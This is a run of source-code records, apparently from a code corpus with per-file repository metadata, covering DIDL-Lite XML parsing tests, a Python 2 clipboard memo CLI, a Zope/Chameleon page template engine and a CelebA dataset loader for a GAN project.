assert len(resources) == 1
resource = resources[0]
assert resource.xml_el is not None
assert resource.protocol_info == "protocol_info"
assert resource.uri == "url"
assert not hasattr(item, "non_existing")
assert item.res == item.resources
def test_item_from_xml_not_strict(self) -> None:
"""Test item from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item id="0" parentID="0" restricted="1">
<dc:title>Audio Item Title</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
<res>url</res>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string, strict=False)
assert len(items) == 1
item = items[0]
assert item.xml_el is not None
assert getattr(item, "title") == "Audio Item Title"
assert getattr(item, "upnp_class") == "object.item.audioItem"
assert getattr(item, "language") == "English"
assert isinstance(item, didl_lite.AudioItem)
assert not hasattr(item, "non_existing")
resources = item.res
assert len(resources) == 1
resource = resources[0]
assert resource.xml_el is not None
assert resource.protocol_info is None # This is now allowed with strict=False
assert resource.uri == "url"
assert not hasattr(item, "non_existing")
assert item.res == item.resources
def test_item_to_xml(self) -> None:
"""Test item to XML."""
resource = didl_lite.Resource("url", "protocol_info")
items = [
didl_lite.AudioItem(
id="0",
parent_id="0",
title="Audio Item Title",
restricted="1",
resources=[resource],
language="English",
),
]
didl_string = didl_lite.to_xml_string(*items).decode("utf-8")
assert 'xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"' in didl_string
assert 'xmlns:dc="http://purl.org/dc/elements/1.1/"' in didl_string
assert 'xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"' in didl_string
assert 'xmlns:sec="http://www.sec.co.kr/"' in didl_string
assert 'xmlns:ns1="urn:schemas-upnp-org:metadata-1-0/upnp/"' not in didl_string
didl_el = ET.fromstring(didl_string)
item_el = didl_el.find("./didl_lite:item", NAMESPACES)
assert item_el is not None
assert item_el.attrib["id"] == "0"
assert item_el.attrib["parentID"] == "0"
assert item_el.attrib["restricted"] == "1"
title_el = item_el.find("./dc:title", NAMESPACES)
assert title_el is not None
assert title_el.text == "Audio Item Title"
class_el = item_el.find("./upnp:class", NAMESPACES)
assert class_el is not None
assert class_el.text == "object.item.audioItem"
language_el = item_el.find("./dc:language", NAMESPACES)
assert language_el is not None
assert language_el.text == "English"
res_el = item_el.find("./didl_lite:res", NAMESPACES)
assert res_el is not None
assert res_el.attrib["protocolInfo"] == "protocol_info"
assert res_el.text == "url"
def test_item_repr(self) -> None:
"""Test item's repr can convert back to an equivalent item."""
# repr method doens't know how package was imported, so only uses class names
from didl_lite.didl_lite import AudioItem, Resource
item = AudioItem(
id="0",
parent_id="0",
title="Audio Item Title",
restricted="1",
res=[
Resource("url", "protocol_info"),
Resource("url2", "protocol_info2"),
],
language="English",
)
item_repr = repr(item)
item_remade = eval(item_repr)
assert ET.tostring(item.to_xml()) == ET.tostring(item_remade.to_xml())
def test_container_from_xml(self) -> None:
"""Test container from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<container id="0" parentID="0" restricted="1">
<dc:title>Album Container Title</dc:title>
<upnp:class>object.container.album</upnp:class>
<item id="1" parentID="0" restricted="1">
<dc:title>Audio Item Title</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
<res protocolInfo="protocol_info">url</res>
</item>
</container>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
container = items[0]
assert container.xml_el is not None
assert isinstance(container, didl_lite.Container)
assert getattr(container, "title") == "Album Container Title"
assert getattr(container, "upnp_class") == "object.container.album"
item = container[0]
assert item.xml_el is not None
assert item.title == "Audio Item Title"
assert item.upnp_class == "object.item.audioItem"
assert item.language == "English"
resources = item.res
assert len(resources) == 1
resource = resources[0]
assert resource.xml_el is not None
assert resource.protocol_info == "protocol_info"
assert resource.uri == "url"
assert item.res == item.resources
def test_container_to_xml(self) -> None:
"""Test container to XML."""
container = didl_lite.Album(
id="0", parent_id="0", title="Audio Item Title", restricted="1"
)
resource = didl_lite.Resource("url", "protocol_info")
item = didl_lite.AudioItem(
id="0",
parent_id="0",
title="Audio Item Title",
restricted="1",
resources=[resource],
language="English",
)
container.append(item)
didl_string = didl_lite.to_xml_string(container).decode("utf-8")
didl_el = ET.fromstring(didl_string)
container_el = didl_el.find("./didl_lite:container", NAMESPACES)
assert container_el is not None
assert container_el.attrib["id"] == "0"
assert container_el.attrib["parentID"] == "0"
assert container_el.attrib["restricted"] == "1"
item_el = container_el.find("./didl_lite:item", NAMESPACES)
assert item_el is not None
assert item_el.attrib["id"] == "0"
assert item_el.attrib["parentID"] == "0"
assert item_el.attrib["restricted"] == "1"
title_el = item_el.find("./dc:title", NAMESPACES)
assert title_el is not None
assert title_el.text == "Audio Item Title"
class_el = item_el.find("./upnp:class", NAMESPACES)
assert class_el is not None
assert class_el.text == "object.item.audioItem"
language_el = item_el.find("./dc:language", NAMESPACES)
assert language_el is not None
assert language_el.text == "English"
res_el = item_el.find("./didl_lite:res", NAMESPACES)
assert res_el is not None
assert res_el.attrib["protocolInfo"] == "protocol_info"
assert res_el.text == "url"
def test_container_repr(self) -> None:
"""Test containers's repr can convert back to an equivalent container."""
from didl_lite.didl_lite import Album, AudioItem, Resource
container = Album(
id="0", parent_id="0", title="Audio Item Title", restricted="1"
)
resource = Resource("url", "protocol_info")
item = AudioItem(
id="0",
parent_id="0",
title="Audio Item Title",
restricted="1",
resources=[resource],
language="English",
)
container.append(item)
container_repr = repr(container)
container_remade = eval(container_repr)
assert ET.tostring(container.to_xml()) == ET.tostring(container_remade.to_xml())
def test_descriptor_from_xml_root(self) -> None:
"""Test root descriptor from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<desc id="1" nameSpace="ns" type="type">Text</desc>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
descriptor = items[0]
assert descriptor is not None
assert descriptor.xml_el is not None
assert getattr(descriptor, "id") == "1"
assert getattr(descriptor, "name_space") == "ns"
assert getattr(descriptor, "type") == "type"
assert getattr(descriptor, "text") == "Text"
def test_descriptor_from_xml_item(self) -> None:
"""Test item descriptor from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item id="1" parentID="0" restricted="1">
<dc:title>Audio Item Title</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
<res protocolInfo="protocol_info">url</res>
<desc id="1" nameSpace="ns" type="type">Text</desc>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
item = items[0]
assert item is not None
assert isinstance(item, didl_lite.AudioItem)
descriptor = item.descriptors[0]
assert descriptor is not None
assert descriptor.xml_el is not None
assert descriptor.id == "1"
assert descriptor.name_space == "ns"
assert descriptor.type == "type"
assert descriptor.text == "Text"
def test_descriptor_from_xml_container(self) -> None:
"""Test container descriptor from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<container id="0" parentID="0" restricted="1">
<dc:title>Album Container Title</dc:title>
<upnp:class>object.container.album</upnp:class>
<desc id="1" nameSpace="ns" type="type">Text</desc>
</container>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
container = items[0]
assert container is not None
assert container.xml_el is not None
assert isinstance(container, didl_lite.Container)
descriptor = container.descriptors[0]
assert descriptor is not None
assert descriptor.xml_el is not None
assert descriptor.id == "1"
assert descriptor.name_space == "ns"
assert descriptor.type == "type"
assert descriptor.text == "Text"
def test_descriptor_from_xml_container_item(self) -> None:
"""Test item descriptor in container from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<container id="0" parentID="0" restricted="1">
<dc:title>Album Container Title</dc:title>
<upnp:class>object.container.album</upnp:class>
<item id="1" parentID="0" restricted="1">
<dc:title>Audio Item Title</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
<res protocolInfo="protocol_info">url</res>
<desc id="1" nameSpace="ns" type="type">Text</desc>
</item>
</container>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
container = items[0]
assert container is not None
assert isinstance(container, didl_lite.Container)
item = container[0]
assert item is not None
descriptor = item.descriptors[0]
assert descriptor is not None
assert descriptor.xml_el is not None
assert descriptor.id == "1"
assert descriptor.name_space == "ns"
assert descriptor.type == "type"
assert descriptor.text == "Text"
def test_descriptor_to_xml(self) -> None:
"""Test descriptor to XML."""
descriptor = didl_lite.Descriptor(
id="1", name_space="ns", type="type", text="Text"
)
item = didl_lite.AudioItem(
id="0",
parent_id="0",
title="Audio Item Title",
restricted="1",
language="English",
descriptors=[descriptor],
)
didl_string = didl_lite.to_xml_string(item).decode("utf-8")
didl_el = ET.fromstring(didl_string)
item_el = didl_el.find("./didl_lite:item", NAMESPACES)
assert item_el is not None
descriptor_el = item_el.find("./didl_lite:desc", NAMESPACES)
assert descriptor_el is not None
assert len(descriptor_el.attrib) == 3
assert descriptor_el.attrib["id"] == "1"
assert descriptor_el.attrib["nameSpace"] == "ns"
assert descriptor_el.attrib["type"] == "type"
assert descriptor_el.text == "Text"
descriptor = didl_lite.Descriptor(id="2", name_space="ns2")
descriptor_el = descriptor.to_xml()
assert descriptor_el is not None
assert len(descriptor_el.attrib) == 2
assert descriptor_el.attrib["id"] == "2"
assert descriptor_el.attrib["nameSpace"] == "ns2"
def test_descriptor_repr(self) -> None:
"""Test descriptor's repr can convert back to an equivalent descriptorb."""
from didl_lite.didl_lite import Descriptor
descriptor = Descriptor(id="1", name_space="ns", type="type", text="Text")
descriptor_repr = repr(descriptor)
descriptor_remade = eval(descriptor_repr)
assert ET.tostring(descriptor.to_xml()) == ET.tostring(
descriptor_remade.to_xml()
)
def test_item_order(self) -> None:
"""Test item ordering."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item id="0" parentID="0" restricted="1">
<dc:title>Audio Item Title 1</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
</item>
<container id="1" parentID="0" restricted="1">
<dc:title>Album Container Title</dc:title>
<upnp:class>object.container.album</upnp:class>
</container>
<item id="2" parentID="0" restricted="1">
<dc:title>Audio Item Title 1</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 3
assert isinstance(items[0], didl_lite.AudioItem)
assert isinstance(items[1], didl_lite.Album)
assert isinstance(items[2], didl_lite.AudioItem)
def test_item_property_attribute_from_xml(self) -> None:
"""Test item property from XML attribute."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item id="0" parentID="0" restricted="1">
<dc:title>Video Item Title</dc:title>
<upnp:class>object.item.videoItem</upnp:class>
<upnp:genre id="genreId">Action</upnp:genre>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
item = items[0]
assert item is not None
assert getattr(item, "genre") == "Action"
assert getattr(item, "genre_id") == "genreId"
def test_item_property_attribute_to_xml(self) -> None:
"""Test item property to XML."""
item = didl_lite.VideoItem(
id="0",
parent_id="0",
title="Video Item Title",
restricted="1",
genre="Action",
genre_id="genreId",
)
didl_string = didl_lite.to_xml_string(item).decode("utf-8")
didl_el = ET.fromstring(didl_string)
item_el = didl_el.find("./didl_lite:item", NAMESPACES)
assert item_el is not None
genre_el = item_el.find("./upnp:genre", NAMESPACES)
assert genre_el is not None
assert genre_el.text == "Action"
assert genre_el.attrib["id"] == "genreId"
def test_item_missing_id(self) -> None:
"""Test item missing ID from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item restricted="1">
<dc:title>Video Item Title</dc:title>
<upnp:class>object.item</upnp:class>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
def test_item_set_attributes(self) -> None:
"""Test item attribute from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item restricted="1">
<dc:title>Video Item Title</dc:title>
<upnp:class>object.item.videoItem</upnp:class>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
item = items[0]
assert getattr(item, "title") == "Video Item Title"
assert hasattr(item, "rating")
assert getattr(item, "rating") is None
assert isinstance(item, didl_lite.VideoItem)
assert len(item.res) == 0
assert item.res == item.resources
def test_extra_properties(self) -> None:
"""Test extra item properties from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item restricted="1">
<dc:title>Video Item Title</dc:title>
<upnp:class>object.item.videoItem</upnp:class>
<upnp:albumArtURI>extra_property</upnp:albumArtURI>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
item = items[0]
assert hasattr(item, "album_art_uri")
assert getattr(item, "album_art_uri") == "extra_property"
def test_default_properties_set(self) -> None:
"""Test defaults for item properties."""
item = didl_lite.VideoItem(
id="0", parent_id="0", title="Video Item Title", restricted="1"
)
assert hasattr(item, "genre_type") # property is set
| 38.017452
| 88
| 0.603011
|
81dad8788b27ec864efe21e8441e1148d844e2f0
| 3,657
|
py
|
Python
|
clipboard_memo/main.py
|
arafsheikh/clipboard-memo
|
7e851b2e70063af878f0b8cef075f6923b2809cb
|
[
"MIT"
] | null | null | null |
clipboard_memo/main.py
|
arafsheikh/clipboard-memo
|
7e851b2e70063af878f0b8cef075f6923b2809cb
|
[
"MIT"
] | null | null | null |
clipboard_memo/main.py
|
arafsheikh/clipboard-memo
|
7e851b2e70063af878f0b8cef075f6923b2809cb
|
[
"MIT"
] | null | null | null |
"""
A command line clipboard manager
"""
from pyperclip import copy, paste
import cPickle as pickle
import argparse, sys, os
class ClipboardMemo(object):
def __init__(self):
#Create directory to save dump file
if not os.path.exists(os.path.expanduser('~/.clipboard_memo/')):
os.makedirs(os.path.expanduser('~/.clipboard_memo/'))
self.dbpath = os.path.expanduser('~/.clipboard_memo/dump.p')
try:
self.memos = pickle.load(open(self.dbpath, 'rb')) #Load saved memos
except IOError:
#If dump doesn't exist create new
self.memos = []
def run(self):
"""Parse and run"""
parser = argparse.ArgumentParser(
description='Save clipboard data as memos',
usage='''clipboard_memo <command> [<args>]
Available commands are:
save Save the contents of clipboard
delete INDEX Delete a memo of given index number
delete -a | --all Delete all saved memos
ls List all saved memos
yank INDEX Copy a memo to clipboard
''')
parser.add_argument('command', help='Subcommand to run')
args = parser.parse_args(sys.argv[1:2]) #Parse only the first argument
if not hasattr(self, args.command):
print 'Unrecognized command'
parser.print_help()
exit(1)
#Execute the given command
getattr(self, args.command)()
def commit(self):
"""Save the current memos to memory."""
pickle.dump(self.memos, open(self.dbpath, 'wb'))
def save(self):
"""Save a new memo to the memos list."""
text = str(paste()) #Data from clipboard
if not bool(text):
exit() #Nothing to save
text = text.encode('utf-8') #Clean string
text = text.strip() #Get rid of whitespaces
self.memos.append(text)
self.commit()
def delete(self):
"""Deletes the memos of the given index number."""
parser = argparse.ArgumentParser(
description='Delete memo of the given index number from clipboard')
parser.add_argument('-i', '--index', type=int, help='Index of the memo to delete')
parser.add_argument('-a', '--all', help='Delete all memos', action='store_true')
args = parser.parse_args(sys.argv[2:])
#Delete all memos
if args.all:
self.memos = [] #Delete all memos
self.commit()
exit(0)
#If index number is provided then delete the particular memo
if args.index:
try:
del self.memos[args.index - 1] #Since we enumerate from 1 instead of 0
except TypeError:
print 'Integer required'
self.commit()
else:
print 'Too few arguments. Provide the index number of memo to delete'
def ls(self):
"""Lists all saved memos."""
print '\n'.join(str(i) for i in enumerate(self.memos, start=1))
def yank(self):
"""Copy the memo corresponding to the given index number to clipboard."""
parser = argparse.ArgumentParser(
description='''Copy the memo corresponding to the given index number
to clipboard''')
parser.add_argument('index', type=int)
args = parser.parse_args(sys.argv[2:])
try:
copy(str(self.memos[args.index - 1])) #Since we enumerate from 1 instead of 0
except TypeError:
pass #Oops
def main():
c = ClipboardMemo()
c.run()
if __name__ == '__main__':
main()
| 32.078947
| 92
| 0.581898
|
75c952b2fef872c35cda4ca91efedcbc680463b3
| 4,022
|
py
|
Python
|
src/Products/PageTemplates/engine.py
|
dek4nice/Zope
|
ec4765fc0007c4e78aafcbeef510077444f8551a
|
[
"ZPL-2.1"
] | 1
|
2018-11-30T12:39:27.000Z
|
2018-11-30T12:39:27.000Z
|
src/Products/PageTemplates/engine.py
|
dek4nice/Zope
|
ec4765fc0007c4e78aafcbeef510077444f8551a
|
[
"ZPL-2.1"
] | null | null | null |
src/Products/PageTemplates/engine.py
|
dek4nice/Zope
|
ec4765fc0007c4e78aafcbeef510077444f8551a
|
[
"ZPL-2.1"
] | 1
|
2018-11-30T12:39:34.000Z
|
2018-11-30T12:39:34.000Z
|
import re
import logging
from zope.interface import implementer
from zope.interface import provider
from zope.pagetemplate.interfaces import IPageTemplateEngine
from zope.pagetemplate.interfaces import IPageTemplateProgram
from z3c.pt.pagetemplate import PageTemplate as ChameleonPageTemplate
from AccessControl.class_init import InitializeClass
from AccessControl.SecurityInfo import ClassSecurityInfo
from Products.PageTemplates.Expressions import getEngine
from Products.PageTemplates import ZRPythonExpr
from chameleon.tales import StringExpr
from chameleon.tales import NotExpr
from chameleon.tal import RepeatDict
from z3c.pt.expressions import PythonExpr, ProviderExpr
from .expression import PathExpr
from .expression import TrustedPathExpr
from .expression import NocallExpr
from .expression import ExistsExpr
from .expression import UntrustedPythonExpr
# Declare Chameleon's repeat dictionary public
RepeatDict.security = ClassSecurityInfo()
RepeatDict.security.declareObjectPublic()
RepeatDict.__allow_access_to_unprotected_subobjects__ = True
InitializeClass(RepeatDict)
re_match_pi = re.compile(r'<\?python([^\w].*?)\?>', re.DOTALL)
logger = logging.getLogger('Products.PageTemplates')
@implementer(IPageTemplateProgram)
@provider(IPageTemplateEngine)
class Program(object):
# Zope 2 Page Template expressions
secure_expression_types = {
'python': UntrustedPythonExpr,
'string': StringExpr,
'not': NotExpr,
'exists': ExistsExpr,
'path': PathExpr,
'provider': ProviderExpr,
'nocall': NocallExpr,
}
# Zope 3 Page Template expressions
expression_types = {
'python': PythonExpr,
'string': StringExpr,
'not': NotExpr,
'exists': ExistsExpr,
'path': TrustedPathExpr,
'provider': ProviderExpr,
'nocall': NocallExpr,
}
extra_builtins = {
'modules': ZRPythonExpr._SecureModuleImporter()
}
def __init__(self, template):
self.template = template
def __call__(self, context, macros, tal=True, **options):
if tal is False:
return self.template.body
# Swap out repeat dictionary for Chameleon implementation
# and store wrapped dictionary in new variable -- this is
# in turn used by the secure Python expression
# implementation whenever a 'repeat' symbol is found
kwargs = context.vars
kwargs['wrapped_repeat'] = kwargs['repeat']
kwargs['repeat'] = RepeatDict(context.repeat_vars)
return self.template.render(**kwargs)
@classmethod
def cook(cls, source_file, text, engine, content_type):
if engine is getEngine():
def sanitize(m):
match = m.group(1)
logger.info(
'skipped "<?python%s?>" code block in '
'Zope 2 page template object "%s".',
match, source_file
)
return ''
text, count = re_match_pi.subn(sanitize, text)
if count:
logger.warning(
"skipped %d code block%s (not allowed in "
"restricted evaluation scope)." % (
count, 's' if count > 1 else ''
)
)
expression_types = cls.secure_expression_types
else:
expression_types = cls.expression_types
# BBB: Support CMFCore's FSPagetemplateFile formatting
if source_file is not None and source_file.startswith('file:'):
source_file = source_file[5:]
if source_file is None:
# Default to '<string>'
source_file = ChameleonPageTemplate.filename
template = ChameleonPageTemplate(
text, filename=source_file, keep_body=True,
expression_types=expression_types,
encoding='utf-8', extra_builtins=cls.extra_builtins,
)
return cls(template), template.macros
| 31.669291
| 71
| 0.657882
|
1e5fa2570f3995fe7e7fa51c631e060f0e80fbb8
| 8,666
|
py
|
Python
|
awesome_gans/stargan/dataset.py
|
StevenJokess/Awesome-GANs
|
b78410e072ec3c0c39a4dac853dea7c219817c65
|
[
"MIT"
] | 739
|
2017-05-28T18:07:38.000Z
|
2022-03-28T23:57:42.000Z
|
awesome_gans/stargan/dataset.py
|
StevenJokess/Awesome-GANs
|
b78410e072ec3c0c39a4dac853dea7c219817c65
|
[
"MIT"
] | 25
|
2018-01-18T07:09:07.000Z
|
2021-08-25T14:11:09.000Z
|
awesome_gans/stargan/dataset.py
|
StevenJokess/Awesome-GANs
|
b78410e072ec3c0c39a4dac853dea7c219817c65
|
[
"MIT"
] | 185
|
2017-07-15T05:18:10.000Z
|
2022-02-17T10:17:02.000Z
|
import os
from glob import glob
import h5py
import numpy as np
from scipy.misc import imread, imresize
from tqdm import tqdm
'''
This dataset is for Celeb-A
- Celeb-A
Celeb-A DataSets can be downloaded at http://mmlab.ie.cuhk.edu.hk/projects/CelebA.html
Celeb-A link : https://drive.google.com/drive/folders/0B7EVK8r0v71pTUZsaXdaSnZBZzg
OR you can download following python code (but it doesn't work as well when i'm trying)
code link : https://github.com/carpedm20/DCGAN-tensorflow/blob/master/download.py
'''
DataSets = {
# Linux
# 'celeb-a': '/home/zero/hdd/DataSet/Celeb-A/img_align_celeba/',
# 'celeb-a-attr': '/home/zero/hdd/DataSet/Celeb-A/list_attr_celeba.txt',
# 'celeb-a-32x32-h5': '/home/zero/hdd/DataSet/Celeb-A/celeb-a-32x32.h5',
# 'celeb-a-64x64-h5': '/home/zero/hdd/DataSet/Celeb-A/celeb-a-64x64.h5',
# Windows
'celeb-a': 'D:\\DataSet\\Celeb-A\\img_align_celeba\\',
'celeb-a-attr': 'D:\\DataSet\\Celeb-A\\list_attr_celeba.txt',
'celeb-a-32x32-h5': 'D:\\DataSet\\Celeb-A\\celeb-a-32x32.h5',
'celeb-a-64x64-h5': 'D:\\DataSet\\Celeb-A\\celeb-a-64x64.h5',
}
class CelebADataSet:
def __init__(
self,
batch_size=128,
input_height=64,
input_width=64,
input_channel=3,
attr_labels=(),
output_height=64,
output_width=64,
output_channel=3,
split_rate=0.2,
random_state=42,
num_threads=8,
mode='w',
):
"""
# General Settings
:param batch_size: training batch size, default 128
:param input_height: input image height, default 64
:param input_width: input image width, default 64
:param input_channel: input image channel, default 3 (RGB)
- in case of Celeb-A, image size is 64x64x3(HWC).
:param attr_labels: attributes of Celeb-A image, default empty tuple
- in case of Celeb-A, the number of attributes is 40
# Output Settings
:param output_height: output images height, default 64
:param output_width: output images width, default 64
:param output_channel: output images channel, default 3
# Pre-Processing Option
:param split_rate: image split rate (into train & test), default 0.2
:param random_state: random seed for shuffling, default 42
:param num_threads: the number of threads for multi-threading, default 8
# DataSet Option
:param mode: file mode(RW), default w
"""
self.batch_size = batch_size
self.input_height = input_height
self.input_width = input_width
self.input_channel = input_channel
'''
# Available attributes
[
5_o_Clock_Shadow, Arched_Eyebrows, Attractive, Bags_Under_Eyes, Bald, Bangs, Big_Lips, Big_Nose, Black_Hair,
Blond_Hair, Blurry, Brown_Hair, Bushy_Eyebrows, Chubby, Double_Chin, Eyeglasses, Goatee, Gray_Hair,
Heavy_Makeup, High_Cheekbones, Male, Mouth_Slightly_Open, Mustache, Narrow_Eyes, No_Beard, Oval_Face,
Pale_Skin, Pointy_Nose, Receding_Hairline, Rosy_Cheeks, Sideburns, Smiling, Straight_Hair, Wavy_Hair,
Wearing_Earrings, Wearing_Hat, Wearing_Lipstick, Wearing_Necklace, Wearing_Necktie, Young
]
'''
self.attr_labels = attr_labels
self.image_shape = [self.batch_size, self.input_height, self.input_width, self.input_channel]
self.output_height = output_height
self.output_width = output_width
self.output_channel = output_channel
self.split_rate = split_rate
self.random_state = random_state
self.num_threads = num_threads # change this value to the fitted value for ur system
self.mode = mode
self.path = "" # DataSet path
self.files = "" # files' name
self.n_classes = 0 # DataSet the number of classes, default 10
self.data = [] # loaded images
self.attr = []
self.num_images = 202599
self.images = []
self.labels = {}
self.ds_name = "" # DataSet Name (by image size)
self.celeb_a(mode=self.mode) # load Celeb-A
def celeb_a(self, mode):
def get_image(path, w, h):
img = imread(path).astype(np.float)
orig_h, orig_w = img.shape[:2]
new_h = int(orig_h * w / orig_w)
img = imresize(img, (new_h, w))
margin = int(round((new_h - h) / 2))
return img[margin : margin + h]
if self.input_height == 32:
self.ds_name = 'celeb-a-32x32-h5'
elif self.input_height == 64:
self.ds_name = 'celeb-a-64x64-h5'
self.labels = self.load_attr() # selected attributes info (list)
if mode == 'w':
self.files = glob(os.path.join(DataSets['celeb-a'], "*.jpg"))
self.files = np.sort(self.files)
self.data = np.zeros(
(len(self.files), self.input_height * self.input_width * self.input_channel), dtype=np.uint8
)
print("[*] Image size : ", self.data.shape)
assert len(self.files) == self.num_images
for n, f_name in tqdm(enumerate(self.files)):
image = get_image(f_name, self.input_width, self.input_height)
self.data[n] = image.flatten()
# write .h5 file for reusing later...
with h5py.File(''.join([DataSets[self.ds_name]]), 'w') as f:
f.create_dataset("images", data=self.data)
self.images = self.load_data(size=self.num_images)
def load_data(self, size, offset=0):
"""
From great jupyter notebook by Tim Sainburg:
http://github.com/timsainb/Tensorflow-MultiGPU-VAE-GAN
"""
with h5py.File(DataSets[self.ds_name], 'r') as hf:
faces = hf['images']
full_size = len(faces)
if size is None:
size = full_size
n_chunks = int(np.ceil(full_size / size))
if offset >= n_chunks:
print("[*] Looping from back to start.")
offset = offset % n_chunks
if offset == n_chunks - 1:
print("[-] Not enough data available, clipping to end.")
faces = faces[offset * size :]
else:
faces = faces[offset * size : (offset + 1) * size]
faces = np.array(faces, dtype=np.float16)
print("[+] Image size : ", faces.shape)
return faces / 255.0
def load_attr(self):
with open(DataSets['celeb-a-attr'], 'r') as f:
img_attr = []
self.num_images = int(f.readline().strip())
self.attr = (f.readline().strip()).split(' ')
print("[*] the number of images : %d" % self.num_images)
print("[*] the number of attributes : %d/%d" % (len(self.attr_labels), len(self.attr)))
for fn in f.readlines():
row = fn.strip().split()
# img_name = row[0]
attr = [int(x) for x in row[1:]]
tmp = [attr[self.attr.index(x)] for x in self.attr_labels]
tmp = [1.0 if x == 1 else 0.0 for x in tmp] # one-hot labeling
img_attr.append(tmp)
return np.asarray(img_attr)
def concat_data(self, img, label):
label = np.tile(
np.reshape(label, [-1, 1, 1, len(self.attr_labels)]), [1, self.input_height, self.input_width, 1]
)
return np.concatenate([img, label], axis=3)
class DataIterator:
def __init__(self, x, y, batch_size, label_off=False):
self.x = x
self.label_off = label_off
if not self.label_off:
self.y = y
self.batch_size = batch_size
self.num_examples = num_examples = x.shape[0]
self.num_batches = num_examples // batch_size
self.pointer = 0
assert self.batch_size <= self.num_examples
def next_batch(self):
start = self.pointer
self.pointer += self.batch_size
if self.pointer > self.num_examples:
perm = np.arange(self.num_examples)
np.random.shuffle(perm)
self.x = self.x[perm]
if not self.label_off:
self.y = self.y[perm]
start = 0
self.pointer = self.batch_size
end = self.pointer
if not self.label_off:
return self.x[start:end], self.y[start:end]
else:
return self.x[start:end]
def iterate(self):
for step in range(self.num_batches):
yield self.next_batch()
| 34.252964
| 117
| 0.591045
|
181e6ca922877292b1f05a1d493ccb1f3f2ef2b9
| 613
|
py
|
Python
|
server/utils/choice.py
|
yseiren87/jellicleSpace
|
10d693bbc04e6b89a7ce15d2dc9797cec2a553b7
|
[
"Apache-2.0"
] | null | null | null |
server/utils/choice.py
|
yseiren87/jellicleSpace
|
10d693bbc04e6b89a7ce15d2dc9797cec2a553b7
|
[
"Apache-2.0"
] | 7
|
2021-03-19T04:47:00.000Z
|
2021-09-22T19:10:46.000Z
|
server/utils/choice.py
|
yseiren87/jellicleSpace
|
10d693bbc04e6b89a7ce15d2dc9797cec2a553b7
|
[
